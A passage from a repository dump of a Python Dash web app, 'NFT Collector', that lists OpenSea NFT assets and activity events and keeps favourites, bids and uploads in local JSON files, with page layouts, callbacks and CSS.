Args:\n datasets A list of dataset objects.\n Return:\n Returns a JSON file that is a list of dictionaries, where\n each dictionary defines a field.\n \"\"\"\n\n search = []\n\n for dataset in datasets:\n categoryNumber = 1\n for category in dataset.categories:\n fieldNumber = 1\n for field in category.fields:\n search.append({\n \"field\" : field.name,\n \"description\": field.description,\n \"category\" : category.title,\n \"dataset\" : dataset.title,\n \"field_link\" : \"%s#field-%d-%d\" % (dataset.getHtmlName(), categoryNumber, fieldNumber),\n \"category_link\" : \"%s#category-%d\" % (dataset.getHtmlName(), categoryNumber),\n \"dataset_link\" : \"%s\" % (dataset.getHtmlName())\n })\n fieldNumber += 1\n categoryNumber += 1\n\n # return as json\n return json.dumps(search)\n\nif __name__ == \"__main__\":\n \"\"\"\n Loop through every dataset in the datadocs yaml\n file.\n \"\"\"\n\n # remove the /docs dir if it exists\n if os.path.exists(\"site\"):\n shutil.rmtree('site')\n # if docs doesn't exist, which it shouldn't, make it again\n if not os.path.exists('site'):\n os.makedirs('site')\n\n # get the data docs settings\n datadocs = yaml.load(open(\"docs/datadocs.yaml\", \"r\"))\n showUncategorized = datadocs['show_uncategorized']\n showPercentAnswered = 
datadocs['show_percent_answered']\n showPrivate = datadocs['show_private']\n\n # instantiate a list of datasets\n datasets = []\n for selectedDataset in datadocs['datasets']:\n # get the dataset name from the datadocs file\n datasetName = selectedDataset['name']\n\n # open the dataset yaml\n selectedDataset = yaml.load(open(\"docs/\" + datasetName + \".yaml\", \"r\"))\n\n datasetTitle = selectedDataset['title']\n datasetDescription = selectedDataset['description']\n\n # set the csv file name, which is just the\n # dataset name plus .csv\n datasetFileName = datasetName\n if \".csv\" not in datasetFileName:\n datasetFileName += \".csv\"\n\n # create a dataset object\n dataset = Dataset(datasetName, datasetTitle, datasetDescription)\n # read the data set as a csv and convert to a data frame\n df = pd.read_csv(\"docs/\" + datasetFileName, sep=',', header=0, encoding='ISO-8859-1', index_col=None)\n\n for selectedCategory in selectedDataset['categories']:\n categoryTitle = selectedCategory['title']\n categoryDescription = None\n if 'description' in selectedCategory:\n categoryDescription = selectedCategory['description']\n # create a category object\n category = Category(categoryTitle, categoryDescription)\n if 'fields' in selectedCategory:\n for selectedField in selectedCategory['fields']:\n fieldName = selectedField['name']\n fieldDescription = selectedField['description']\n fieldIsPrivate = False\n if 'private' in selectedField:\n fieldIsPrivate = selectedField['private']\n fieldIsTransformed = False\n if 'transformed' in selectedField:\n fieldIsTransformed = selectedField['transformed']\n\n # create a field object only if the field is not private or the\n # field is private and the settings indiate we want to display\n # private fields.\n if showPrivate == True or (showPrivate == False and fieldIsPrivate == False):\n field = Field(fieldName, description=fieldDescription, private=fieldIsPrivate, transformed=fieldIsTransformed)\n if \"type\" not in selectedField:\n # the user has not documented a datatype, so let's\n # guess what the data type is.\n field.dataType = field.getDataType(df)\n else:\n # Documentation includes a data type, so use that instead\n field.dataType = selectedField['type']\n\n # add this field to the category\n category.addField(field)\n\n # add this category to the dataset\n dataset.addCategory(category)\n\n # add this dataset to the list of datasets\n datasets.append(dataset)\n\n # determine if we want to add uncategorized field\n if showUncategorized:\n dataset.addUncategorizedFields(df)\n\n # generate search index\n search = generateSearch(datasets)\n\n \"\"\"\n Render templates\n \"\"\"\n # jinja2 templating settings\n env = Environment(loader=PackageLoader('makedocs', 'templates'))\n\n # make index page\n template = env.get_template('home.html')\n file = open('site/index.html', 'w')\n\n # documentation properties\n docTitle = None\n docDescription = None\n showPercentAnswered = None\n if datadocs['title']:\n docTitle = datadocs['title']\n if datadocs['show_percent_answered']:\n showPercentAnswered = datadocs['show_percent_answered']\n\n # check if there is an index.md file in /docs. 
If there is\n # open it up, convert the markdown contents and pass it along as\n # content\n try:\n content = markdown.markdown(open('docs/index.md', 'r').read())\n except:\n content = None\n file.write(template.render(datasets=datasets, static=\"static\", home=\"index.html\", docTitle=docTitle,\n search=search, content=content))\n\n for dataset in datasets:\n template = env.get_template('dataset.html')\n file = open('site/%s' % (dataset.getHtmlName()), 'w')\n\n # check if there is an [file_name].md file in /docs. If there is\n # open it up, convert the markdown contents and pass it along as\n # content\n try:\n content = markdown.markdown(open('docs/' + dataset.name + '.md', 'r').read())\n except:\n content = None\n\n file.write(template.render(dataset=dataset, datasets=datasets, static=\"static\", home=\"index.html\",\n docTitle=docTitle, showPercentAnswered=showPercentAnswered,\n showUncategorized=showUncategorized, search=search, content=content))\n\n # copy static folder (css and images)\n shutil.copytree(\"static\", \"site/static\")\n"
},
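For reference, each element of the search index that `generateSearch` in `makedocs.py` above builds is a flat dictionary. The sketch below shows the shape of one entry; the keys are exactly the ones the function sets, while the values are made up for illustration:

```python
# shape of one generateSearch entry (values are illustrative only)
entry = {
    "field": "likes_cake",
    "description": "Whether the person likes cake.",
    "category": "Preferences",
    "dataset": "Example dataset",
    "field_link": "example.html#field-1-1",      # dataset page + field anchor
    "category_link": "example.html#category-1",  # dataset page + category anchor
    "dataset_link": "example.html",
}
```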
{
"alpha_fraction": 0.761551022529602,
"alphanum_fraction": 0.7637795209884644,
"avg_line_length": 47.08571243286133,
"blob_id": "b4609be852ecdee395a000aa3f849ea8acc24fef",
"content_id": "1a2582fdd1ddeb5b98fbf88ddc9b8f4a43b3a474",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 6731,
"license_type": "no_license",
"max_line_length": 419,
"num_lines": 140,
"path": "/README.md",
"repo_name": "dhenderson/datadocs",
"src_encoding": "UTF-8",
"text": "# Datadocs\n\nDatadocs is static documentation for your datasets. I developed Datadocs to organize the vast number of datasets and fields we maintain at the [Family Independence Initiative][fii] (FII). Datadocs is fully searchable and great for internal use as well as sharing with external partners (we use it for both purposes at FII). \n\nSome key features of datadocs:\n\n- Fully searchable static documentation that can be hosted anywhere, including on Dropbox or S3.\n- Logically categorize fields, making it easier to quickly understand what fields a dataset contains.\n- Designate which fields are private or protected, especially useful when sharing with external partners.\n- Designate which fields are raw versus which have undergone some transformation. It is common to create new variables based on the raw data one has, keeping track of this makes for better, cleaner analysis.\n\nYou can view an example of datadocs with some dummy data on my personal site at [fullcontactphilanthropy/datadocs][example]. Datadocs is written for and tested in Python 3.4.\n\n# Getting started\n\nYour documentation goes in the `/docs` folder. You should delete the contents of the included example data and do the following:\n\n1. **Add your data as csv files** - Datadocs requires each dataset to be a comma delimited `csv` file. Drop each of your `csv` files in the `/docs` folder and remove the \"example.csv\" file.\n2. **Write yaml files for each csv** - Each `csv` file needs a `yaml` file of the same name. For example, if your dataset is `my_dataset.csv`, then Datadocs requires you to include a file named `my_dataset.yaml`. I recommend copying the `example.yaml` file and using that as a base template. How to write your `yaml` files is discussed in more detail in the following section on \"Documenting and registering your data\".\n3. **[Optional] Include markdown files** - If you want, you can include markdown files with additional detail about your datasets. Like the `yaml` files, include a similarly named `md` file to provide additional documentation for a dataset. For example, add a `my_dataset.md` to render markdown content before the data documentation for your `my_dataset.csv` file.\n4. **[Optional] Include an index.md file** - If you want to provide additional documentation on the index page of your documentation, you can include an `index.md` file. The `index.md` file is useful for giving a high level view of your data before a reader dives into the datasets.\n5. **Register your datasets** - Before making your documentation, you need to register each dataset in the `datadocs.yaml` file. For example, to add the `my_dataset.csv` and its `yaml` and `md` files, simply add `my_dataset` to the list of datasets in the `datadocs.yaml` file.\n6. **Make your documentation** - From the root directory execute `makedocs.py` with Python 3. 
Your static documentation will be built in the `/site` folder.\n\n# Documenting and registering your data\n\nThis section provides more detail on how to document and register your data in datadocs.\n\n## Documenting your data\n\nEach dataset `yaml` files has the following structure:\n\n```yaml\ntitle: \"Some title\"\ndescription: \"Some description\"\ncategories:\n - title: \"Some category title\"\n description: \"Some category description\"\n fields:\n - name: \"Some field name as found in the .csv file\"\n description: \"Some description for this field\"\n```\n\nEach field can also have have optional attributes as defined below.\n\n### Type\n\nThe `type` attribute indicates a field's datatype. This field is optional as Datadocs attempts to guess a field's datatype based on the data provided in your `csv` file. If you want to make sure the documentation produces the correct datatype, or you want to override Datadocs's guess, you can do so with `type`.\n\nUsage:\n\n```yaml\nfields:\n - name: \"Some field name as found in the .csv file\"\n description: \"Some description for this field\"\n type: \"Date\"\n```\n\nWhile you can provide any string for `type`, Datadocs expects one of the following:\n\n- Boolean\n- Categorical\n- Date\n- JSON\n- Numeric\n- Text\n- Yaml\n\n### Private\n\nThe `private` attribute indicates if a field is private or not. It is sometimes useful to document a field in a dataset and to share that you *have* a particular field, but that the field is somehow protected or private. A good example might be a Social Security number.\n\nUsage:\n\n```yaml\nfields:\n - name: \"Some field name as found in the .csv file\"\n description: \"Some description for this field\"\n private: false\n```\n\n### Transformed\n\nThe `transformed` attribute indicates if a field underwent some form of transformation. For example, if we have household size and the number of people in a household as raw data and we calculate the household's federal poverty line, the new variable would be considered transformed.\n\nUsage:\n\n```yaml\nfields:\n - name: \"Some field name as found in the .csv file\"\n description: \"Some description for this field\"\n transformed: false\n```\n\n## Registering your data\n\nYour datasets are registered in `/docs/datadocs.yaml`. If you had the following tow datasets:\n\n- my_dataset.csv\n- some_other_dataset.csv\n\nYour `datadocs.yaml` file might look like:\n\n```yaml\ntitle: \"My data documentation\"\nshow_uncategorized: false\nshow_percent_answered: false\nshow_private: true\ndatasets:\n - name: \"my_dataset\"\n - name: \"some_other_dataset\"\n```\n\nNote the file above also includes some metadata and settings, defined below:\n\n**title** - Title for your documentation.\n**show_uncategorized** - Whether to show fields you have not provided documentation for. Setting this attribute to `true` can be useful for determining which fields have not been documented yet.\n**show_percent_answered** - Whether to show the percent of fields that are not null. For example, if you have ten observations for a field with three nulls, setting `show_percent_answered` to `true` would indicate that 70% of observations are not null in your documentation for that field.\n**show_private** - Whether to include fields set to private when building the documentation. 
Toggling this attribute can be useful if you are sharing external documentation and you want to have certain fields documented, but you don't want others to know the field exists at all.\n\n# Building your documentation\n\nBuild your documentation by navigating to the root `datadocs` folder and typing the following at your command line:\n\n```bash\n$ python3 makedocs.py\n```\n\n# Dependencies\n\nA complete list of dependencies and version numbers are listed in the `requirements.txt` file in the root directory. Key dependencies are:\n\n- python 3\n- pandas\n- Markdown\n- Jinja2\n- PyYaml\n\n[fii]: http://fii.org\n[example]: http://fullcontactphilanthropy.com/datadocs/"
},
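The `show_percent_answered` setting described in the README above boils down to a per-column non-null ratio. Here is a minimal sketch of that calculation with pandas; the function name `percent_answered` and the sample series are ours for illustration, not part of datadocs itself:

```python
import pandas as pd

def percent_answered(series: pd.Series) -> float:
    """Share of observations that are not null, as a percentage."""
    return 100.0 * series.notna().mean()

# ten observations with three nulls -> 70.0, matching the README's example
s = pd.Series([1, 2, 3, None, 5, None, 7, 8, None, 10])
print(percent_answered(s))  # 70.0
```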
{
"alpha_fraction": 0.7608453631401062,
"alphanum_fraction": 0.764182448387146,
"avg_line_length": 179,
"blob_id": "2ff9243919b94deb54276ae54567c3f595607f31",
"content_id": "c93024486d23d197745fea1d46968bdc9a4dc2d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 899,
"license_type": "no_license",
"max_line_length": 307,
"num_lines": 5,
"path": "/docs/example.md",
"repo_name": "dhenderson/datadocs",
"src_encoding": "UTF-8",
"text": "This page provides documentation for some nonsense data. A few things to note in the `docs/example.yaml` file which defines the dataset features on this page:\n\n1. **Datatype guesses** - Datadocs attempts to guess the datatype of each filed by reading the provided `.csv` file. If you want to ensure the proper datatypes is included, you can use the 'type' key when defining a field.\n2. **Private fields** - The field `sex` is set to `private`. A private field is noted with a lock icon, and signals to the reader that while the field exists, it may not be available to be shared with others.\n3. **Transformed fields** - The `is_male_likes_cake` is set to `transformed`. Transformation means the datapoint has some how been constructed. For example, in this case `is_male_likes_cake` is determined based on answers to the `Sex` and `Likes cake` fields. Transformed fields are noted by an \"edit\" icon."
},
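The "datatype guesses" behaviour mentioned in this example page can be approximated by inspecting what pandas infers for each CSV column. The sketch below is our illustration of the idea, not datadocs' actual implementation; `guess_type` and its dtype-to-label mapping are assumptions:

```python
import pandas as pd

def guess_type(series: pd.Series) -> str:
    """Map a pandas dtype onto labels like the README lists (Boolean, Date, Numeric, Text)."""
    if pd.api.types.is_bool_dtype(series):       # check bool first: bools also count as numeric
        return "Boolean"
    if pd.api.types.is_datetime64_any_dtype(series):
        return "Date"
    if pd.api.types.is_numeric_dtype(series):
        return "Numeric"
    return "Text"

df = pd.DataFrame({"age": [31, 45], "likes_cake": [True, False], "name": ["a", "b"]})
print({col: guess_type(df[col]) for col in df.columns})
# {'age': 'Numeric', 'likes_cake': 'Boolean', 'name': 'Text'}
```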
{
"alpha_fraction": 0.7847533822059631,
"alphanum_fraction": 0.7847533822059631,
"avg_line_length": 40.875,
"blob_id": "5e8aa77c79aeb54fd8a82c6b9dbc6419b9e2bf5e",
"content_id": "e2f690fe37d44599291566a2ce527555132068f6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 669,
"license_type": "no_license",
"max_line_length": 320,
"num_lines": 16,
"path": "/docs/index.md",
"repo_name": "dhenderson/datadocs",
"src_encoding": "UTF-8",
"text": "# Introduction\n\nThis is a sample implementation of [Datadocs][datadocs]. Datadocs is a way to document your datasets, often called things like:\n\n- Data documentation\n- Data dictionary\n- Code book\n- etc.\n\nWhatever you call it, Datadocs is a way of documenting it.\n\n# Getting started with Datadocs\n\nSee the `README.md` file for detailed documentation for getting started. You should however clear out the contents of `/docs`, including this file, and put in your own documentation files. You should however get started by deleting the contents of this `index.md` file and writing your own documentation index page here.\n\n[datadocs]: https://github.com/dhenderson/datadocs"
}
] | 4 |
ohs2033/auction_algorithm
|
https://github.com/ohs2033/auction_algorithm
|
f3853ac79d1c1844691b803393902a36db51fdff
|
983a9bfe0e9747e9ca7aa25b5e7baccc9a361970
|
1e67b2259086fa4738605e29f2c982ab2bf87b30
|
refs/heads/master
| 2020-12-25T18:53:15.140287 | 2017-06-11T15:08:04 | 2017-06-11T15:08:04 | 94,012,041 | 0 | 0 | null | 2017-06-11T15:02:31 | 2016-02-08T21:54:53 | 2016-02-09T00:39:43 | null |
[
{
"alpha_fraction": 0.5446927547454834,
"alphanum_fraction": 0.5623835921287537,
"avg_line_length": 29.906475067138672,
"blob_id": "99f34a979935af8533697a8e01a785f3cba10d40",
"content_id": "70fdf980b9ec5ec4e4e272a3ab0d4456a8590968",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4574,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 139,
"path": "/auction_alg.py",
"repo_name": "ohs2033/auction_algorithm",
"src_encoding": "UTF-8",
"text": "#-*- encoding: utf-8 -*-\nimport random\nimport timeit\nimport subprocess\nfrom collections import deque\n\nclass Auction(object): \n\n \"\"\"\n 변수 설명:\n matrix: bidder - goods 사이의 weight(value)를 나타내는 2차원 list\n assignments: 현재 상품(key)의 입찰자가 누구인지(value) 할당 관계를 나타내는 dictonary.\n q: 현재 goods에 할당되지 않은 bidder들을 담고 있는 queue(선입선출의 자료구조, python standard library로 구현)\n n: goods, 또는 bidder의 수(goods와 bidder의 수는 반드시 같아야 함.)\n price_arr: 입찰이 이루어질때마다 update되는 상품의 가격. (초기에 모두 0으로 시작함.)\n epsilon: 알고리즘의 종료를 보장하기 위한 실수값으로서 1/(n+1)로 계산된다.\n \"\"\"\n\n def __init__(self):\n self._assignments = {}\n self._matrix = [[0]]\n self._q = deque()\n self._n = 1\n self._price_arr = [0] * self._n\n self._epsilon = 0\n\n @property\n def matrix(self):\n return self._matrix\n \n @property\n def assignments(self):\n # format below\n for key, value in self._assignments.iteritems():\n print '(A{1}), (O{0})'.format(value + 1, key + 1)\n \n @matrix.setter\n def matrix(self, matrix):\n n = len(matrix)\n\n # check to make sure there is the same number of agents and objects\n if n is 0: raise Exception(\"matrix must be larger than 0\")\n for i in matrix:\n if len(i) is not n: raise Exception(\"matrix must have same number of rows and columns\")\n\n # 변수들을 초기화한다.\n self._matrix = matrix\n self._n = len(matrix)\n self._q = deque(range(0, self._n))\n self._price_arr = [0] * self._n\n self._epsilon = 1.0 / (1 + self._n)\n _assignments = {}\n\n\n def solve_auction(self):\n \"\"\"Return the string representing the solution to the assignment problem.\"\"\"\n start_time = timeit.default_timer()\n while len(self._q) > 0:\n # remove unassigned agent from the stack\n agent = self._q.popleft()\n\n # calculate current utility of agent -- this is not calculating correctly\n utility_arr = self._compute_utility_arr(agent)\n\n # pull out two largest values\n (x, px, py) = self._two_largest(utility_arr)\n\n # need an if or else it'll keep going\n self._if_assigned_replace(x, agent)\n\n # modify the price\n self._make_bid(x, px, py)\n\n elapsed = timeit.default_timer() - start_time\n print elapsed\n\n def _if_assigned_replace(self, x, agent):\n if x in self._assignments:\n if self._assignments[x] is not agent:\n self._q.append(self._assignments[x])\n self._assignments[x] = agent\n\n def _compute_utility_arr(self, agent):\n return [u - p for u, p in zip(self._matrix[agent], self._price_arr)]\n\n def _two_largest(self, utility_arr):\n \"\"\"Returns a list of the largest index and second_largest index\"\"\"\n largest, second_largest = None, None\n for x in utility_arr:\n if x >= largest:\n largest, second_largest = x, largest\n elif x > second_largest:\n second_largest = x\n return utility_arr.index(largest), largest, second_largest\n\n def _make_bid(self, x, px, py):\n #\n bid_increment = self._epsilon\n self._price_arr[x] = self._price_arr[x] + bid_increment\n\n def _compute_total_value(self):\n \"\"\"Return the optimal LP solution's final total\"\"\"\n total = 0\n for obj, agent in self._assignments.iteritems():\n total += self._matrix[agent][obj]\n\n print 'optimal solution: {}'.format(total)\n return total\n\n def gen_random(self, n, M):\n \"\"\"Set the random sqaure matrix of size n\"\"\"\n m = []\n for i in range(0, n):\n m.append([])\n for j in range(0, n):\n m[i].append(random.randint(0, M-1))\n\n self.matrix = m\n\n def compute_per_agent_average(self):\n total = self._compute_total_value()\n avg = float(total) / self._n\n return avg\n\nac = Auction()\n\nmat = [\n [30 , 37 , 40 , 28 , 40],\n [40 , 24 , 27 , 21 , 36],\n [40 , 32 , 33 
, 30 , 35],\n [25 , 38 , 40 , 36 , 36],\n [29 , 62 , 41 , 34 , 39]\n]\n\nprint setattr(ac, 'matrix', mat)\nac.solve_auction()\nprint ac.assignments\navg = ac.compute_per_agent_average()\nprint 'average value is:',avg\n"
},
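For a matrix as small as the 5×5 example above, the auction result can be cross-checked against an exhaustive search over all n! assignments. Below is a sketch of such a check, written in Python 3 (note the repository code itself is Python 2); the helper name `brute_force_optimum` is ours:

```python
from itertools import permutations

def brute_force_optimum(matrix):
    """Exhaustively find the assignment maximizing total value (only feasible for small n)."""
    n = len(matrix)
    best_total, best_assignment = float("-inf"), None
    for perm in permutations(range(n)):  # perm[agent] = object given to that agent
        total = sum(matrix[agent][obj] for agent, obj in enumerate(perm))
        if total > best_total:
            best_total, best_assignment = total, perm
    return best_total, best_assignment

mat = [
    [30, 37, 40, 28, 40],
    [40, 24, 27, 21, 36],
    [40, 32, 33, 30, 35],
    [25, 38, 40, 36, 36],
    [29, 62, 41, 34, 39],
]
print(brute_force_optimum(mat))  # compare against the total printed by solve_auction
```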
{
"alpha_fraction": 0.7297297120094299,
"alphanum_fraction": 0.7374517321586609,
"avg_line_length": 42.16666793823242,
"blob_id": "5849ffc93dce1a7de0258a9179a3b4664c77c94e",
"content_id": "133240e6e322e499efcf9281241b3fd1d9e56b46",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 866,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 12,
"path": "/README.md",
"repo_name": "ohs2033/auction_algorithm",
"src_encoding": "UTF-8",
"text": "# Auction algorithm \n\nAssignment problem 을 풀기 위한 Auction algorithm의 구현입니다.\n<br>Auction algorithm은 헝가리안 알고리즘에 비해 알려져있지 않지만 상당히 간단한 알고리즘입니다.\n\n### 변수 해설\n- bidder - goods 사이의 weight(value)를 나타내는 2차원 list\n- assignments: 현재 상품(key)의 입찰자가 누구인지(value) 할당 관계를 나타내는 dictonary.\n- q: 현재 goods에 할당되지 않은 bidder들을 담고 있는 queue(선입선출의 자료구조, python standard library로 구현)\n- n: goods, 또는 bidder의 수(goods와 bidder의 수는 반드시 같아야 함.)\n- price_arr: 입찰이 이루어질때마다 update되는 상품의 가격. (초기에 모두 0으로 시작함.)\n- epsilon: 알고리즘의 종료를 보장하기 위한 실수값으로서 1/(n+1)로 계산된다.\n"
}
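The choice ε = 1/(n+1) listed above is what makes the result exact for integer-valued matrices: the auction algorithm's final assignment comes within n·ε of the optimum, and n·ε = n/(n+1) is strictly below 1, so no better integer-valued assignment can be missed. A quick check of that arithmetic:

```python
# epsilon-optimality margin for the auction algorithm with epsilon = 1/(n+1)
for n in (1, 5, 100):
    epsilon = 1.0 / (n + 1)
    print(n, n * epsilon, n * epsilon < 1)  # margin stays strictly below 1
```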
] | 2 |
KineBergseth/stacc-Kodekonkurranse-2021
|
https://github.com/KineBergseth/stacc-Kodekonkurranse-2021
|
6673ea7c91761994e52b558bd674e022246ee3d3
|
a4328aa18a8562233283eac78c3b17aa6ed5594a
|
9dd8035a77f7667d135e4fb3880aaebc67d345c8
|
refs/heads/master
| 2023-09-03T12:22:43.951286 | 2021-10-17T21:46:29 | 2021-10-17T21:46:29 | 415,425,371 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6000763177871704,
"alphanum_fraction": 0.6029383540153503,
"avg_line_length": 30.572288513183594,
"blob_id": "1a7c1a6e6710509b49d050cc7ce3643ed94018f3",
"content_id": "d509fd2b7cf6fd1ae4337f894569c09b0d0dc9b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5241,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 166,
"path": "/apps/profile.py",
"repo_name": "KineBergseth/stacc-Kodekonkurranse-2021",
"src_encoding": "UTF-8",
"text": "import requests\nimport pandas as pd\nimport json\nfrom dash import html, dcc, Input, Output\nfrom dash.dash_table.Format import Format, Symbol\nfrom dash import dash_table\nimport random\nfrom app import app\n\n\ndef create_layout():\n \"\"\"\n Create html display with all components\n :return: html with components\n \"\"\"\n return html.Div(\n children=[\n html.H1('lizardlover23 profile', className=\"mt-3\"),\n html.P('Welcome back @lizardlover23', className=\"text-muted\"),\n html.P(['Here you can find an overview of your activity, such as your favorites assets, the bids you have '\n 'placed, and the NFTs you have upload and put for sale.', html.Br(),\n 'The display table has a built-in '\n 'sorting system']),\n dcc.Tabs(id=\"profile-tabs\", children=[\n dcc.Tab(label='Favorites', value='fav-tab'),\n dcc.Tab(label='Your active bids', value='bid-tab'),\n dcc.Tab(label='Your uploaded NFTs', value='upload-tab'),\n ],\n className=\"nav nav-tabs\",\n ),\n html.Div(id='profile-content-tabs')\n ])\n\n\ndef add_imgmarkdown(url):\n \"\"\"\n Add html to link to display image\n :param url: NFT image link\n :return: link in html element\n \"\"\"\n return \"<img src='{url}' height='75' />\".format(url=url)\n\n\ndef generate_table(data):\n \"\"\"\n Generate datatable with data about NFTs added to collection\n :param data: dataframe with NFT data\n :return: HTML to render table\n \"\"\"\n return dash_table.DataTable(\n id='table',\n data=data.to_dict('records'),\n columns=[\n {\"id\": \"image_url\", \"name\": \"NFT\", \"presentation\": \"markdown\"},\n {\"id\": \"name\", \"name\": \"name\"},\n {\"id\": \"price\", \"name\": \"Current bid\", 'format': Format().symbol(Symbol.yes).symbol_suffix('*'),\n },\n ],\n markdown_options={\"html\": True},\n sort_action='native',\n style_header={},\n style_cell={'textAlign': 'left', \"whiteSpace\": \"pre-line\"},\n style_as_list_view=True,\n editable=False,\n row_deletable=True,\n )\n\n\ndef get_asset(asset_contract_address, token_id):\n \"\"\"\n Get a perticular NFT\n :param asset_contract_address:\n :param token_id:\n :return: json data about NFT\n \"\"\"\n url = \"https://api.opensea.io/api/v1/asset/{asset_contract_address}/{token_id}/\".format(\n asset_contract_address=asset_contract_address, token_id=token_id)\n response = requests.request(\"GET\", url)\n return response.json()\n\n\ndef get_NFTs(df):\n \"\"\"\n For all NFTs in a dataframe, get more data from api\n :param df: dataframe with local stored data\n :return: dataframe with asset data\n \"\"\"\n bids = []\n for item in df.index:\n bids.append(get_asset(df['asset_contract_address'][item], df['token_id'][item]))\n df = pd.json_normalize(bids)\n col_list = ['id', 'token_id', 'asset_contract.address', 'image_url', 'name']\n df = pd.DataFrame(df, columns=col_list)\n df['image_url'] = df['image_url'].apply(add_imgmarkdown)\n df = df.rename(columns={'asset_contract.address': 'asset_contract_address'})\n return df\n\n\ndef random_bid_gen():\n \"\"\"\n Generate random number to add as fake bid on the users uploaded NFTS\n :return: int between 0-40\n \"\"\"\n random_bid = random.randint(0, 40)\n return random_bid\n\n\ndef tab_favs():\n \"\"\"\n Get favourite data from json and convert to df and create table\n :return: dataframe with NFT data\n \"\"\"\n f = open('favourites.json', )\n fav_data = json.load(f)\n df_fav = pd.DataFrame(fav_data['favourites'])\n df = get_NFTs(df_fav)\n return generate_table(df)\n\n\ndef tab_bids():\n \"\"\"\n Get bid data from json and convert to df and create table\n 
:return: dataframe with NFT data\n \"\"\"\n f = open('bids.json', )\n bid_data = json.load(f)\n df_bid = pd.DataFrame(bid_data['bids'])\n df = get_NFTs(df_bid)\n result = pd.merge(df, df_bid)\n return generate_table(result)\n\n\ndef tab_uploads():\n \"\"\"\n Get data about uploaded NFTs from json and convert to df and create table\n :return: dataframe with NFT data\n \"\"\"\n f = open('uploads.json', )\n uploaded_data = json.load(f)\n df_uploads = pd.DataFrame(uploaded_data['uploaded_nfts'])\n col_list = ['id', 'token_id', 'asset_contract.address', 'image_url', 'name']\n df = pd.DataFrame(df_uploads, columns=col_list)\n df['image_url'] = df['image_url'].apply(add_imgmarkdown)\n\n # generate some random fictive bids for the users uploaded NFTs\n fictive_bids = []\n for row in df.index:\n fictive_bids.append(random_bid_gen())\n df['price'] = fictive_bids\n return generate_table(df)\n\n\[email protected](Output('profile-content-tabs', 'children'),\n Input('profile-tabs', 'value'))\ndef render_tabcontent(tab):\n \"\"\"\n Render tab content based on user click input\n :param tab: tab id\n :return: call function to get correct data and generate datatable\n \"\"\"\n if tab == 'fav-tab':\n return tab_favs()\n elif tab == 'bid-tab':\n return tab_bids()\n elif tab == 'upload-tab':\n return tab_uploads()\n"
},
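The tab builders above assume `favourites.json`, `bids.json` and `uploads.json` already exist in the working directory with the top-level keys the code indexes. If you run the app locally and the files are missing, a bootstrap sketch like this (our own helper, not part of the repository) creates empty versions:

```python
import json
import os

# top-level keys match what profile.py reads: 'favourites', 'bids', 'uploaded_nfts'
SEED = {
    "favourites.json": {"favourites": []},
    "bids.json": {"bids": []},
    "uploads.json": {"uploaded_nfts": []},
}

for filename, payload in SEED.items():
    if not os.path.exists(filename):
        with open(filename, "w") as f:
            json.dump(payload, f, indent=4)
```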
{
"alpha_fraction": 0.556317925453186,
"alphanum_fraction": 0.5608919262886047,
"avg_line_length": 31.09174346923828,
"blob_id": "4f6df416f37a21c1b5739abd88c2d4fbed237ca8",
"content_id": "bf1ec94c78df4e10a3f0f30609650cad40a90f5d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3498,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 109,
"path": "/apps/events.py",
"repo_name": "KineBergseth/stacc-Kodekonkurranse-2021",
"src_encoding": "UTF-8",
"text": "import dash_bootstrap_components as dbc\nimport requests\nimport dash\nimport pandas as pd\nfrom dash.exceptions import PreventUpdate\nfrom dash import html, dash_table, Input, Output\nfrom app import app\n\n\ndef convert_price(wei):\n \"\"\"\n convert wei to ETH\n :param url: wei amount\n :return: ETH amount\n \"\"\"\n return wei / pow(10, 18)\n\n\ndef add_imgmarkdown(url):\n \"\"\"\n Add html to link to display image\n :param url: NFT image link\n :return: link in html element\n \"\"\"\n return \"<img src='{url}' height='75' />\".format(url=url)\n\n\ndef get_events(event_type):\n url = f\"https://api.opensea.io/api/v1/events?event_type={event_type}&only_opensea=false&offset=0&limit=30\"\n headers = {\"Accept\": \"application/json\"}\n response = requests.request(\"GET\", url, headers=headers)\n data = response.json()\n\n df = pd.json_normalize(data['asset_events'])\n df = pd.DataFrame(df)\n col_list = ['asset.image_url', 'asset.name', 'event_type', 'ending_price']\n df = pd.DataFrame(df, columns=col_list)\n df['asset.image_url'] = df['asset.image_url'].apply(add_imgmarkdown)\n df['ending_price'] = df['ending_price'].astype(float)\n df['ending_price'] = df['ending_price'].apply(convert_price)\n pd.set_option('display.max_colwidth', None) # extend colwidth to display whole value, instead of partial values\n return df\n\n\ndef generate_table(data):\n return dash_table.DataTable(\n id='table',\n data=data.to_dict('records'),\n columns=[\n {\"id\": \"asset.image_url\", \"name\": \"NFT\", \"presentation\": \"markdown\"},\n {\"id\": \"asset.name\", \"name\": \"Item\"},\n {\"id\": \"ending_price\", \"name\": \"Price ETH\"},\n {\"id\": \"event_type\", \"name\": \"Event\"},\n ],\n markdown_options={\"html\": True},\n sort_action='native',\n style_header={},\n style_cell={'textAlign': 'left', \"whiteSpace\": \"pre-line\"},\n style_as_list_view=True,\n editable=False,\n )\n\n\ndef create_layout():\n \"\"\"\n Creates the layout for the home page\n :return: layout with all the elements in\n \"\"\"\n\n return html.Div(\n [\n html.Div(\n [\n html.H1('Activity', className='header-text text-center mt-3'),\n dbc.ButtonGroup(\n [\n dbc.Button(\"Listings\", id=\"created\", outline=True, color=\"primary\"),\n dbc.Button(\"Sales\", id=\"successful\", outline=True, color=\"primary\"),\n dbc.Button(\"Bids\", id=\"bid_entered\", outline=True, color=\"primary\"),\n dbc.Button(\"Transfers\", id=\"transfer\", outline=True, color=\"primary\"),\n ],\n className=\"mt-3 mb-3\",\n )\n ],\n className=\"header\",\n ),\n html.Div(id=\"event_list\"),\n ],\n className=\"main\"\n )\n\n\[email protected](\n 